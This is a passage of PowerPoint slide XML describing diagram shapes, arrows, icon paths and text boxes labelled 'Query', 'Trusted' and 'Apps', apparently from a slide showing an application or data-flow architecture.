                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="600"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="FF8C00"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Query</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="134" name="Right Arrow 133"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4498625" y="3264391"/>
                <a:ext cx="640080" cy="194266"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                  <a:gd name="adj2" fmla="val 42077"/>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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="Right Arrow 134"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2968418" y="4147173"/>
              <a:ext cx="2010586" cy="191920"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 42077"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="136" name="Group 135"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="407015" y="2077031"/>
              <a:ext cx="4020072" cy="1850206"/>
              <a:chOff x="552782" y="1811255"/>
              <a:chExt cx="4022261" cy="1851214"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="137" name="TextBox 136"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2531358" y="1811255"/>
                <a:ext cx="1136060" cy="369405"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="931316" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1799" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Trusted</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="139" name="Group 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="552782" y="1848374"/>
                <a:ext cx="1367562" cy="1031973"/>
                <a:chOff x="9997894" y="2293268"/>
                <a:chExt cx="1540109" cy="1162178"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="156" name="TextBox 155"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9997894" y="2293268"/>
                  <a:ext cx="1540109" cy="218338"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                    <a:lnSpc>
                      <a:spcPct val="90000"/>
                    </a:lnSpc>
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="600"/>
                    </a:spcAft>
                    <a:buClrTx/>
                    <a:buSzTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                    <a:tabLst/>
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" sz="1399" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="505050"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      <a:ea typeface="+mn-ea"/>
                      <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    </a:rPr>
                    <a:t>Apps</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="157" name="Group 156"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="10178353" y="2549675"/>
                  <a:ext cx="1153613" cy="905771"/>
                  <a:chOff x="1182634" y="2480113"/>
                  <a:chExt cx="1274677" cy="1000824"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="158" name="Freeform 157"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="1184439" y="2654562"/>
                    <a:ext cx="1272611" cy="826375"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 678350 w 1481959"/>
                      <a:gd name="connsiteY0" fmla="*/ 258990 h 962317"/>
                      <a:gd name="connsiteX1" fmla="*/ 688805 w 1481959"/>
                      <a:gd name="connsiteY1" fmla="*/ 259224 h 962317"/>
                      <a:gd name="connsiteX2" fmla="*/ 971484 w 1481959"/>
                      <a:gd name="connsiteY2" fmla="*/ 259224 h 962317"/>
                      <a:gd name="connsiteX3" fmla="*/ 1006067 w 1481959"/>
                      <a:gd name="connsiteY3" fmla="*/ 292305 h 962317"/>
                      <a:gd name="connsiteX4" fmla="*/ 1006067 w 1481959"/>
                      <a:gd name="connsiteY4" fmla="*/ 576488 h 962317"/>
                      <a:gd name="connsiteX5" fmla="*/ 1004269 w 1481959"/>
                      <a:gd name="connsiteY5" fmla="*/ 595185 h 962317"/>
                      <a:gd name="connsiteX6" fmla="*/ 996845 w 1481959"/>
                      <a:gd name="connsiteY6" fmla="*/ 596703 h 962317"/>
                      <a:gd name="connsiteX7" fmla="*/ 946477 w 1481959"/>
                      <a:gd name="connsiteY7" fmla="*/ 546841 h 962317"/>
                      <a:gd name="connsiteX8" fmla="*/ 903068 w 1481959"/>
                      <a:gd name="connsiteY8" fmla="*/ 547059 h 962317"/>
                      <a:gd name="connsiteX9" fmla="*/ 711725 w 1481959"/>
                      <a:gd name="connsiteY9" fmla="*/ 740344 h 962317"/>
                      <a:gd name="connsiteX10" fmla="*/ 661739 w 1481959"/>
                      <a:gd name="connsiteY10" fmla="*/ 719332 h 962317"/>
                      <a:gd name="connsiteX11" fmla="*/ 535436 w 1481959"/>
                      <a:gd name="connsiteY11" fmla="*/ 593028 h 962317"/>
                      <a:gd name="connsiteX12" fmla="*/ 520710 w 1481959"/>
                      <a:gd name="connsiteY12" fmla="*/ 557602 h 962317"/>
                      <a:gd name="connsiteX13" fmla="*/ 597984 w 1481959"/>
                      <a:gd name="connsiteY13" fmla="*/ 478826 h 962317"/>
                      <a:gd name="connsiteX14" fmla="*/ 709855 w 1481959"/>
                      <a:gd name="connsiteY14" fmla="*/ 368988 h 962317"/>
                      <a:gd name="connsiteX15" fmla="*/ 720565 w 1481959"/>
                      <a:gd name="connsiteY15" fmla="*/ 351055 h 962317"/>
                      <a:gd name="connsiteX16" fmla="*/ 722022 w 1481959"/>
                      <a:gd name="connsiteY16" fmla="*/ 347917 h 962317"/>
                      <a:gd name="connsiteX17" fmla="*/ 723721 w 1481959"/>
                      <a:gd name="connsiteY17" fmla="*/ 338718 h 962317"/>
                      <a:gd name="connsiteX18" fmla="*/ 723262 w 1481959"/>
                      <a:gd name="connsiteY18" fmla="*/ 334338 h 962317"/>
                      <a:gd name="connsiteX19" fmla="*/ 723111 w 1481959"/>
                      <a:gd name="connsiteY19" fmla="*/ 333602 h 962317"/>
                      <a:gd name="connsiteX20" fmla="*/ 714729 w 1481959"/>
                      <a:gd name="connsiteY20" fmla="*/ 315979 h 962317"/>
                      <a:gd name="connsiteX21" fmla="*/ 678087 w 1481959"/>
                      <a:gd name="connsiteY21" fmla="*/ 280035 h 962317"/>
                      <a:gd name="connsiteX22" fmla="*/ 668098 w 1481959"/>
                      <a:gd name="connsiteY22" fmla="*/ 262301 h 962317"/>
                      <a:gd name="connsiteX23" fmla="*/ 678350 w 1481959"/>
                      <a:gd name="connsiteY23" fmla="*/ 258990 h 962317"/>
                      <a:gd name="connsiteX24" fmla="*/ 72174 w 1481959"/>
                      <a:gd name="connsiteY24" fmla="*/ 72174 h 962317"/>
                      <a:gd name="connsiteX25" fmla="*/ 72174 w 1481959"/>
                      <a:gd name="connsiteY25" fmla="*/ 887737 h 962317"/>
                      <a:gd name="connsiteX26" fmla="*/ 1402569 w 1481959"/>
                      <a:gd name="connsiteY26" fmla="*/ 887737 h 962317"/>
                      <a:gd name="connsiteX27" fmla="*/ 1402569 w 1481959"/>
                      <a:gd name="connsiteY27" fmla="*/ 72174 h 962317"/>
                      <a:gd name="connsiteX28" fmla="*/ 65620 w 1481959"/>
                      <a:gd name="connsiteY28" fmla="*/ 0 h 962317"/>
                      <a:gd name="connsiteX29" fmla="*/ 1416339 w 1481959"/>
                      <a:gd name="connsiteY29" fmla="*/ 0 h 962317"/>
                      <a:gd name="connsiteX30" fmla="*/ 1481959 w 1481959"/>
                      <a:gd name="connsiteY30" fmla="*/ 65621 h 962317"/>
                      <a:gd name="connsiteX31" fmla="*/ 1481959 w 1481959"/>
                      <a:gd name="connsiteY31" fmla="*/ 896697 h 962317"/>
                      <a:gd name="connsiteX32" fmla="*/ 1416339 w 1481959"/>
                      <a:gd name="connsiteY32" fmla="*/ 962317 h 962317"/>
                      <a:gd name="connsiteX33" fmla="*/ 65620 w 1481959"/>
                      <a:gd name="connsiteY33" fmla="*/ 962317 h 962317"/>
                      <a:gd name="connsiteX34" fmla="*/ 0 w 1481959"/>
                      <a:gd name="connsiteY34" fmla="*/ 896697 h 962317"/>
                      <a:gd name="connsiteX35" fmla="*/ 0 w 1481959"/>
                      <a:gd name="connsiteY35" fmla="*/ 65621 h 962317"/>
                      <a:gd name="connsiteX36" fmla="*/ 65620 w 1481959"/>
                      <a:gd name="connsiteY36" fmla="*/ 0 h 96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81959" h="962317">
                        <a:moveTo>
                          <a:pt x="678350" y="258990"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="681742" y="259020"/>
                          <a:pt x="685484" y="259288"/>
                          <a:pt x="688805" y="259224"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="971484" y="259224"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1000302" y="256718"/>
                          <a:pt x="1008071" y="270753"/>
                          <a:pt x="1006067" y="292305"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="1006067" y="576488"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1004269" y="595185"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1002451" y="598026"/>
                          <a:pt x="999695" y="598003"/>
                          <a:pt x="996845" y="596703"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="946477" y="546841"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="934430" y="534914"/>
                          <a:pt x="914995" y="535011"/>
                          <a:pt x="903068" y="547059"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="711725" y="740344"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="699360" y="748226"/>
                          <a:pt x="689313" y="744295"/>
                          <a:pt x="661739" y="719332"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="535436" y="593028"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="524870" y="579553"/>
                          <a:pt x="516830" y="569445"/>
                          <a:pt x="520710" y="557602"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="597984" y="478826"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="709855" y="368988"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="715078" y="361976"/>
                          <a:pt x="718582" y="356117"/>
                          <a:pt x="720565" y="351055"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="721405" y="350159"/>
                          <a:pt x="721848" y="349083"/>
                          <a:pt x="722022" y="347917"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="723326" y="344409"/>
                          <a:pt x="723862" y="341379"/>
                          <a:pt x="723721" y="338718"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="723959" y="337241"/>
                          <a:pt x="723892" y="335759"/>
                          <a:pt x="723262" y="334338"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="723291" y="334071"/>
                          <a:pt x="723225" y="333829"/>
                          <a:pt x="723111" y="333602"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="722700" y="327088"/>
                          <a:pt x="719734" y="320887"/>
                          <a:pt x="714729" y="315979"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="678087" y="280035"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="668098" y="262301"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="669005" y="259420"/>
                          <a:pt x="673283" y="258942"/>
                          <a:pt x="678350" y="258990"/>
                        </a:cubicBezTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="72174" y="72174"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="72174" y="887737"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1402569" y="887737"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1402569" y="72174"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="65620" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1416339" y="0"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1452581" y="0"/>
                          <a:pt x="1481959" y="29379"/>
                          <a:pt x="1481959" y="65621"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="1481959" y="896697"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1481959" y="932938"/>
                          <a:pt x="1452581" y="962317"/>
                          <a:pt x="1416339" y="962317"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="65620" y="962317"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="29379" y="962317"/>
                          <a:pt x="0" y="932938"/>
                          <a:pt x="0" y="896697"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="0" y="65621"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="29379"/>
                          <a:pt x="29379" y="0"/>
                          <a:pt x="65620" y="0"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91377" tIns="45688" rIns="45688" bIns="91377" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:noAutofit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913387" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                      <a:lnSpc>
                        <a:spcPct val="100000"/>
                      </a:lnSpc>
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:buClrTx/>
                      <a:buSzTx/>
                      <a:buFontTx/>
                      <a:buNone/>
                      <a:tabLst/>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr kumimoji="0" lang="en-US" sz="1398" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:solidFill>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                      <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="159" name="Freeform 158"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="1182634" y="2480113"/>
                    <a:ext cx="1274677" cy="149574"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 1126907 w 1484366"/>
                      <a:gd name="connsiteY0" fmla="*/ 92222 h 174178"/>
                      <a:gd name="connsiteX1" fmla="*/ 1126907 w 1484366"/>
                      <a:gd name="connsiteY1" fmla="*/ 100883 h 174178"/>
                      <a:gd name="connsiteX2" fmla="*/ 1184646 w 1484366"/>
                      <a:gd name="connsiteY2" fmla="*/ 100883 h 174178"/>
                      <a:gd name="connsiteX3" fmla="*/ 1184646 w 1484366"/>
                      <a:gd name="connsiteY3" fmla="*/ 92222 h 174178"/>
                      <a:gd name="connsiteX4" fmla="*/ 1229754 w 1484366"/>
                      <a:gd name="connsiteY4" fmla="*/ 51724 h 174178"/>
                      <a:gd name="connsiteX5" fmla="*/ 1276267 w 1484366"/>
                      <a:gd name="connsiteY5" fmla="*/ 51724 h 174178"/>
                      <a:gd name="connsiteX6" fmla="*/ 1276267 w 1484366"/>
                      <a:gd name="connsiteY6" fmla="*/ 98237 h 174178"/>
                      <a:gd name="connsiteX7" fmla="*/ 1229754 w 1484366"/>
                      <a:gd name="connsiteY7" fmla="*/ 98237 h 174178"/>
                      <a:gd name="connsiteX8" fmla="*/ 1224142 w 1484366"/>
                      <a:gd name="connsiteY8" fmla="*/ 46112 h 174178"/>
                      <a:gd name="connsiteX9" fmla="*/ 1224142 w 1484366"/>
                      <a:gd name="connsiteY9" fmla="*/ 103850 h 174178"/>
                      <a:gd name="connsiteX10" fmla="*/ 1281879 w 1484366"/>
                      <a:gd name="connsiteY10" fmla="*/ 103850 h 174178"/>
                      <a:gd name="connsiteX11" fmla="*/ 1281879 w 1484366"/>
                      <a:gd name="connsiteY11" fmla="*/ 46112 h 174178"/>
                      <a:gd name="connsiteX12" fmla="*/ 1335992 w 1484366"/>
                      <a:gd name="connsiteY12" fmla="*/ 45213 h 174178"/>
                      <a:gd name="connsiteX13" fmla="*/ 1328262 w 1484366"/>
                      <a:gd name="connsiteY13" fmla="*/ 54101 h 174178"/>
                      <a:gd name="connsiteX14" fmla="*/ 1352498 w 1484366"/>
                      <a:gd name="connsiteY14" fmla="*/ 75181 h 174178"/>
                      <a:gd name="connsiteX15" fmla="*/ 1328262 w 1484366"/>
                      <a:gd name="connsiteY15" fmla="*/ 96262 h 174178"/>
                      <a:gd name="connsiteX16" fmla="*/ 1335992 w 1484366"/>
                      <a:gd name="connsiteY16" fmla="*/ 105149 h 174178"/>
                      <a:gd name="connsiteX17" fmla="*/ 1361471 w 1484366"/>
                      <a:gd name="connsiteY17" fmla="*/ 82986 h 174178"/>
                      <a:gd name="connsiteX18" fmla="*/ 1386951 w 1484366"/>
                      <a:gd name="connsiteY18" fmla="*/ 105149 h 174178"/>
                      <a:gd name="connsiteX19" fmla="*/ 1394681 w 1484366"/>
                      <a:gd name="connsiteY19" fmla="*/ 96262 h 174178"/>
                      <a:gd name="connsiteX20" fmla="*/ 1370445 w 1484366"/>
                      <a:gd name="connsiteY20" fmla="*/ 75181 h 174178"/>
                      <a:gd name="connsiteX21" fmla="*/ 1394681 w 1484366"/>
                      <a:gd name="connsiteY21" fmla="*/ 54101 h 174178"/>
                      <a:gd name="connsiteX22" fmla="*/ 1386951 w 1484366"/>
                      <a:gd name="connsiteY22" fmla="*/ 45213 h 174178"/>
                      <a:gd name="connsiteX23" fmla="*/ 1361471 w 1484366"/>
                      <a:gd name="connsiteY23" fmla="*/ 67375 h 174178"/>
                      <a:gd name="connsiteX24" fmla="*/ 63432 w 1484366"/>
                      <a:gd name="connsiteY24" fmla="*/ 0 h 174178"/>
                      <a:gd name="connsiteX25" fmla="*/ 83802 w 1484366"/>
                      <a:gd name="connsiteY25" fmla="*/ 0 h 174178"/>
                      <a:gd name="connsiteX26" fmla="*/ 1420934 w 1484366"/>
                      <a:gd name="connsiteY26" fmla="*/ 0 h 174178"/>
                      <a:gd name="connsiteX27" fmla="*/ 1484366 w 1484366"/>
                      <a:gd name="connsiteY27" fmla="*/ 63432 h 174178"/>
                      <a:gd name="connsiteX28" fmla="*/ 1484366 w 1484366"/>
                      <a:gd name="connsiteY28" fmla="*/ 150684 h 174178"/>
                      <a:gd name="connsiteX29" fmla="*/ 1479753 w 1484366"/>
                      <a:gd name="connsiteY29" fmla="*/ 174178 h 174178"/>
                      <a:gd name="connsiteX30" fmla="*/ 1430558 w 1484366"/>
                      <a:gd name="connsiteY30" fmla="*/ 149160 h 174178"/>
                      <a:gd name="connsiteX31" fmla="*/ 49548 w 1484366"/>
                      <a:gd name="connsiteY31" fmla="*/ 149661 h 174178"/>
                      <a:gd name="connsiteX32" fmla="*/ 1505 w 1484366"/>
                      <a:gd name="connsiteY32" fmla="*/ 161689 h 174178"/>
                      <a:gd name="connsiteX33" fmla="*/ 0 w 1484366"/>
                      <a:gd name="connsiteY33" fmla="*/ 63432 h 174178"/>
                      <a:gd name="connsiteX34" fmla="*/ 1289 w 1484366"/>
                      <a:gd name="connsiteY34" fmla="*/ 50648 h 174178"/>
                      <a:gd name="connsiteX35" fmla="*/ 4985 w 1484366"/>
                      <a:gd name="connsiteY35" fmla="*/ 38742 h 174178"/>
                      <a:gd name="connsiteX36" fmla="*/ 18580 w 1484366"/>
                      <a:gd name="connsiteY36" fmla="*/ 18578 h 174178"/>
                      <a:gd name="connsiteX37" fmla="*/ 38741 w 1484366"/>
                      <a:gd name="connsiteY37" fmla="*/ 4985 h 174178"/>
                      <a:gd name="connsiteX38" fmla="*/ 50648 w 1484366"/>
                      <a:gd name="connsiteY38" fmla="*/ 1289 h 174178"/>
                      <a:gd name="connsiteX39" fmla="*/ 63432 w 1484366"/>
                      <a:gd name="connsiteY39" fmla="*/ 0 h 17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84366" h="174178">
                        <a:moveTo>
                          <a:pt x="1126907" y="92222"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1126907" y="100883"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1184646" y="100883"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1184646" y="92222"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1229754" y="51724"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1276267" y="51724"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1276267" y="98237"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1229754" y="98237"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1224142" y="46112"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1224142" y="103850"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1281879" y="103850"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1281879" y="46112"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1335992" y="45213"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1328262" y="54101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1352498" y="75181"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1328262" y="96262"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1335992" y="105149"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1361471" y="82986"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1386951" y="105149"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1394681" y="96262"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1370445" y="75181"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1394681" y="54101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1386951" y="45213"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1361471" y="67375"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="63432" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="83802" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1420934" y="0"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1455967" y="0"/>
                          <a:pt x="1484366" y="28399"/>
                          <a:pt x="1484366" y="63432"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="1484366" y="150684"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1484366" y="159000"/>
                          <a:pt x="1482766" y="166943"/>
                          <a:pt x="1479753" y="174178"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1468946" y="158703"/>
                          <a:pt x="1450867" y="149160"/>
                          <a:pt x="1430558" y="149160"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="49548" y="149661"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="33534" y="148156"/>
                          <a:pt x="13509" y="150663"/>
                          <a:pt x="1505" y="161689"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1002" y="128937"/>
                          <a:pt x="501" y="96184"/>
                          <a:pt x="0" y="63432"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="59053"/>
                          <a:pt x="444" y="54777"/>
                          <a:pt x="1289" y="50648"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2135" y="46519"/>
                          <a:pt x="3380" y="42536"/>
                          <a:pt x="4985" y="38742"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
